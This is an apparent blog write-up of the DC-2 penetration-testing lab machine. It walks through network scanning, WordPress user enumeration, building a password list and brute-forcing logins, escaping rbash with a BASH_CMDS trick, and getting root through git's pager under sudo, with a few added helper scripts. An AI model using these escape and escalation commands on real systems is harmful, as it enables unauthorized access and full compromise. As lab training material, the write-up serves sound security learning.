DC-2 Target Machine Writeup

Please note that unauthorized penetration testing is illegal.

Table of contents

Foreword

1. Prerequisites

2. Penetration testing

  1. Idea

  2. Process

    2.1 Information collection

    2.2 Vulnerability discovery

    2.3 Exploitation

    2.4 Privilege escalation

3. Summary


Foreword

The DC series target machines are virtual machines built for penetration-testing practice and network-security labs. Each one offers a different set of vulnerabilities and attack scenarios in which penetration testers can exercise their skills and tools. The series covers several topics, such as operating-system vulnerabilities, web application security and wireless network security, and is valuable to beginners and professionals alike because it shows how security vulnerabilities arise and how they are exploited during a penetration test.


1. Prerequisites

Attack machine: Kali

IP address: 192.168.10.137

Target machine: DC-2 (Linux)

IP address: 192.168.10.139 (as discovered with netdiscover in section 2.1)

DC-2 download link: http://www.five86.com/downloads/DC-2.zip

Network: the two hosts must be on the same LAN, so the two virtual machines' network adapters must use the same mode (NAT or bridged)

Goal: find 5 flags

2. Penetration testing

1. Idea

A penetration test needs a plan. Mine is:

Information collection -> vulnerability discovery -> exploitation (SQL injection, file upload vulnerabilities, framework vulnerabilities, SSH attacks, etc.) -> reverse shell

-> privilege escalation

2. Process

2.1 Information Collection

We first use netdiscover to find live hosts on the LAN via ARP scanning.

netdiscover -r 192.168.10.0/24

The IP address of DC-2 turns out to be 192.168.10.139. Next we scan its ports with nmap.

nmap -sS -A -p- 192.168.10.139

-sS: TCP SYN scan. It never completes the TCP handshake, which is why this technique is usually called half-open scanning
-A: aggressive scan (enables OS detection, version detection, script scanning and traceroute)
-p-: scan all 65535 TCP ports instead of nmap's default top 1000

The target has port 80 (HTTP) and port 7744 (SSH) open.

Opening http://192.168.10.139 in the browser did not load the page, so I suspected there might be a hidden port and scanned again with nmap.

nmap -sS -sV -T4 -O -A 192.168.10.139

-sV: detect the version of the service listening on each port
-T0 to -T5: timing template (scan speed); T4 is usually enough
-O: detect the target's operating system

The http-title script output explains why the page did not load:

Did not follow redirect to http://dc-2/

The web server redirects to the hostname dc-2, which the attack machine cannot resolve. Adding an entry to the local hosts file (/etc/hosts) fixes that.

vim /etc/hosts
192.168.10.139 dc-2
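As an added example (not part of the original writeup), here is how the redirect host can be pulled out of the nmap output and turned into the hosts entry automatically. The nmap text inside the script is a constructed sample in nmap's format with the service banners left out, and the function names are my own:

```shell
# Added example, not part of the original writeup: extract the redirect target that
# nmap's http-title script reports and build the matching /etc/hosts line, so the
# virtual host can be resolved without hand-editing. The scan output below is a
# constructed sample in nmap's output format (service banners omitted), using the
# target IP found in 2.1; the redirect_host/scanned_ip/hosts_line names are my own.
set -u

NMAP_SAMPLE='Nmap scan report for 192.168.10.139
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH'

# Host part of the first "Did not follow redirect to" line (read from stdin), empty if none.
redirect_host() {   # usage: redirect_host < nmap-output
  sed -nE 's#.*Did not follow redirect to https?://([^/:[:space:]]+).*#\1#p' | head -n 1
}

# IPv4 address on the "Nmap scan report for" line of a saved scan.
scanned_ip() {      # usage: scanned_ip <nmap-output-file>
  grep -m 1 '^Nmap scan report for' "$1" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | head -n 1
}

# "<ip> <host>" ready for /etc/hosts; prints nothing and fails if no redirect was seen.
hosts_line() {      # usage: hosts_line <nmap-output-file>
  host=$(redirect_host < "$1")
  [ -n "$host" ] || return 1
  printf '%s %s\n' "$(scanned_ip "$1")" "$host"
}

TMP=$(mktemp -d)
NMAP_FILE="$TMP/nmap-dc2.txt"
printf '%s\n' "$NMAP_SAMPLE" > "$NMAP_FILE"
HOSTS_LINE=$(hosts_line "$NMAP_FILE")
echo "$HOSTS_LINE"                      # 192.168.10.139 dc-2
# On the attack machine (not run here): append the line, then confirm the site answers
#   echo "$HOSTS_LINE" | sudo tee -a /etc/hosts
#   curl -sI http://dc-2/ | head -n 1
```

Keeping the scan output in a file (nmap -oN) and deriving the hosts entry from it avoids typing the wrong IP when the DHCP lease changes between boots, which is exactly what happened between the prerequisites and the scan above.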

The website can now be accessed.

The menu contains a Flag link; clicking it reveals the first flag.

 Flag 1:
Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can't win them all.
Log in as one to see the next flag.
If you can't find it, log in as another.


The flag hints that we need to find users and passwords (and name-drops cewl). We use whatweb to fingerprint the site.

whatweb http://192.168.10.139/

The site runs WordPress, so next we use dirsearch to enumerate its directories.

dirsearch -u http://192.168.10.139/ -x 403 404 405 500

-x: exclude the listed HTTP status codes from the output

This turns up the WordPress admin page, which is a login page.

 2.2 Vulnerability discovery

I tried a weak password first, but it was wrong. I then used msf to search for vulnerabilities in the WordPress framework, found a great many, tried a few and gave up. Remembering the flag's hint that more passwords are better, I searched Baidu for password-related WordPress vulnerabilities. Nothing relevant came up, but the search did turn up a tool that can enumerate WordPress usernames: WPScan.

wpscan --url dc-2 -e u
-e u: enumerate usernames (by default WPScan tries user IDs 1 to 10)

Three usernames are found: admin, jerry and tom. Next come the passwords; other writeups use the Cewl tool for this.

Cewl is a crawler written in Ruby. You give it a URL and a crawl depth (and optionally let it follow external links), and it returns a wordlist built from the words found on the pages. The wordlist can then be fed to a password cracker such as John the Ripper; Cewl itself is driven from the command line.

cewl http://dc-2/ -w /root/Desktop/password.txt

Once the crawl finishes we have a candidate password list; we also write the three usernames to a text file.
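To make clear where the passwords are about to come from, here is a small cewl-style wordlist builder as an added example; it is not the page's or cewl's own code. The HTML snippet is constructed in the style of a WordPress default-content page, not copied from DC-2, and the file names and the 3-character minimum word length (cewl's default) are assumptions:

```shell
# Added example, not part of the original writeup: a minimal re-implementation of what
# cewl does on this page, so it is visible that the passwords are simply words from the
# site's own text. The HTML below is a constructed snippet in the style of the DC-2 front
# page, not a copy of it; file names and the min-length default are assumptions.
set -u

SAMPLE_HTML='<html><body>
<h1>Lorem ipsum</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor.</p>
<p>Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.</p>
<a href="/index.php/flag/">Flag</a>
</body></html>'

# cewl-style wordlist: strip tags, keep alphabetic runs of at least min-len characters
# (cewl defaults to 3), drop duplicates while keeping first-seen order.
make_wordlist() {   # usage: make_wordlist <html-file> <out-file> [min-len]
  min=${3:-3}
  sed -e 's/<[^>]*>/ /g' "$1" | grep -oE "[A-Za-z]{$min,}" | awk '!seen[$0]++' > "$2"
}

# The usernames WPScan enumerated, one per line, for the brute-force step.
make_userlist() {   # usage: make_userlist <out-file>
  printf '%s\n' admin jerry tom > "$1"
}

TMP=$(mktemp -d)
printf '%s\n' "$SAMPLE_HTML" > "$TMP/dc-2.html"
WORDLIST="$TMP/password.txt"
USERLIST="$TMP/users.txt"
make_wordlist "$TMP/dc-2.html" "$WORDLIST"
make_userlist "$USERLIST"
echo "$(grep -c . "$WORDLIST") candidate passwords, $(grep -c . "$USERLIST") users"
# Against the live target (not run here) the two lists feed the login brute force:
#   wpscan --url http://dc-2/ -U "$USERLIST" -P "$WORDLIST"
```

Note that the attribute text inside tags (href, index, php) never reaches the list, while the visible link text Flag does; cewl behaves the same way, which is why the real list is small enough to brute-force in Burp.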

 2.3 Exploitation

We use Burp Suite to capture the login request and brute-force it with the user and password lists we obtained.

Two matching username/password pairs come out:

tom   parturient
jerry adipiscing

Logging in through the web page reveals the second flag.

 Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.



Flag 2 hints at a different entrance, which brings SSH to mind, so we log in to the target over SSH as tom.

ssh username@ip_address -p port

ssh tom@192.168.10.139 -p 7744

The login succeeds, but on checking what we can do we find the account is locked into rbash.

rbash is restricted bash, which is often used on jump hosts to limit what logged-in users can do. It is the same program as bash (rbash is usually just a symlink to bash, equivalent to running bash -r), but in restricted mode it forbids certain actions: changing directory with cd, setting or unsetting PATH, SHELL, ENV and BASH_ENV, running commands whose names contain a slash, redirecting output, and so on. Commands that are not in the restricted PATH therefore cannot be run.

Let's see which commands are still available.

echo is a shell builtin and still works, so we use it with a glob to list the contents of the restricted PATH directory without needing ls:

echo $PATH
echo /home/tom/usr/bin/*

The directory contains less, ls, scp and vi. A search for ways to bypass rbash turned up a blog post with the following escape:

# Use the BASH_CMDS hash table to define a command named a that points at an unrestricted shell, then run it
BASH_CMDS[a]=/bin/sh;a

# In the new /bin/sh, which is not restricted, put the standard directories back on PATH
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

The restriction is bypassed. The third flag is in tom's home directory, in flag3.txt.

flag3 

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.


flag3 hints at su, which suggests switching to another user. I first tried to SSH in as jerry, but the login failed.

So, following the hint, I used su from tom's shell to become jerry and then searched the filesystem for flag files:

su jerry
# password: adipiscing
find / -name "*flag*" 2>/dev/null

This turns up flag4.txt in jerry's home directory:

cd /home/jerry/
ls
cat flag4.txt

 flag4

Good to see that you've made it this far - but you're not home yet. 
You still need to get the final flag (the only flag that really counts!!!).  
No hints here - you're on your own now. :-)
Go on - git outta here!!!!


2.4 Privilege escalation

Now for the most important step, privilege escalation. First check which commands we may run through sudo:

sudo -l

We may run git as root via sudo, and flag4's "git outta here" points at git too, so git is very likely the intended escalation path. Looking git up on a privilege-escalation reference gives the following:
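Before looking anything up, the sudo -l output itself can be screened for binaries that are known to hand out a shell. The script below is an added example, not part of the original writeup; the sudo output it parses is a constructed sample in sudo's format (the git line matches what jerry is granted here, the second entry is invented to exercise comma-separated grants), and the SHELL_ESCAPES list is a hand-picked subset, not a complete reference:

```shell
# Added example, not part of the original writeup: screen `sudo -l` output for binaries
# that are known to hand the caller a shell (git and man through their pager, less/more/vi
# through their ! commands, find through -exec, awk through system()). The sudo output
# below is a constructed sample in sudo's own format: the git line is what this box grants
# jerry, the second entry is invented to exercise comma-separated grants. SHELL_ESCAPES is
# a short hand-picked list, not a complete reference.
set -u

SUDO_SAMPLE='Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (ALL) /bin/ls, /usr/bin/find'

SHELL_ESCAPES='git man less more vi vim find awk python perl'

# Commands granted to the user: the non-empty lines after "may run the following commands",
# with the "(runas) TAG:" prefix removed and comma-separated entries split one per line.
sudo_commands() {   # usage: sudo_commands < sudo-l-output
  awk '/may run the following commands/ {on=1; next} on && NF' \
    | sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*((NOPASSWD|PASSWD|SETENV|NOEXEC):[[:space:]]*)*//' \
    | tr ',' '\n' \
    | sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//' \
    | awk 'NF'
}

# Subset of the granted commands whose basename is in SHELL_ESCAPES.
sudo_escapes() {    # usage: sudo_escapes < sudo-l-output
  sudo_commands | while IFS= read -r cmd; do
    bin=${cmd%% *}            # first word, in case arguments are pinned in sudoers
    base=${bin##*/}
    case " $SHELL_ESCAPES " in
      *" $base "*) printf '%s\n' "$bin" ;;
    esac
  done
}

TMP=$(mktemp -d)
SUDO_FILE="$TMP/sudo-l.txt"
printf '%s\n' "$SUDO_SAMPLE" > "$SUDO_FILE"
sudo_escapes < "$SUDO_FILE"
# Output:
#   /usr/bin/git
#   /usr/bin/find
# On the target, after pasting the two functions into the shell:  sudo -l 2>/dev/null | sudo_escapes
```

The hit list is only a starting point: a binary that is not on it may still be dangerous (anything that can write a file as root, for instance), and a listed one may be neutralised by NOEXEC or by pinned arguments, so the output tells you where to look first, not where to stop.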

sudo git -p help config
!/bin/sh

-p forces git to send the help text through its pager (less) even if it would fit on the screen, and less lets you run a command by typing ! at its prompt; since the pager is running as root, !/bin/sh drops us into a root shell. Check the privileges with id, then go to the root directory for the fifth flag.

id
cd /root
ls
cat final-flag.txt

With that, DC-2 has also been fully compromised.


3. Summary

Attack path through the DC-2 range:

1. Information collection first: we discovered the HTTP and SSH services, added a hosts entry for dc-2 so the site would load, and found flag1.

2. Following the hint, we scanned the site's directories and found the login page, enumerated usernames with WPScan, built a password list with Cewl, brute-forced the logins with Burp Suite to find valid credentials, logged in to WordPress (as jerry) and found flag2.

3. Following the next hint, we logged in over SSH, this time as tom, found ourselves in rbash, bypassed the restriction with the commands above and found flag3 in tom's home directory.

4. flag3 told us to change user. SSH as jerry failed, so we switched to jerry with su from tom's session and found flag4 with find.

5. Privilege escalation: sudo -l showed that jerry may run git as root, so we used git's pager to get a root shell and found the final flag in /root.

Origin blog.csdn.net/m0_66638011/article/details/130650537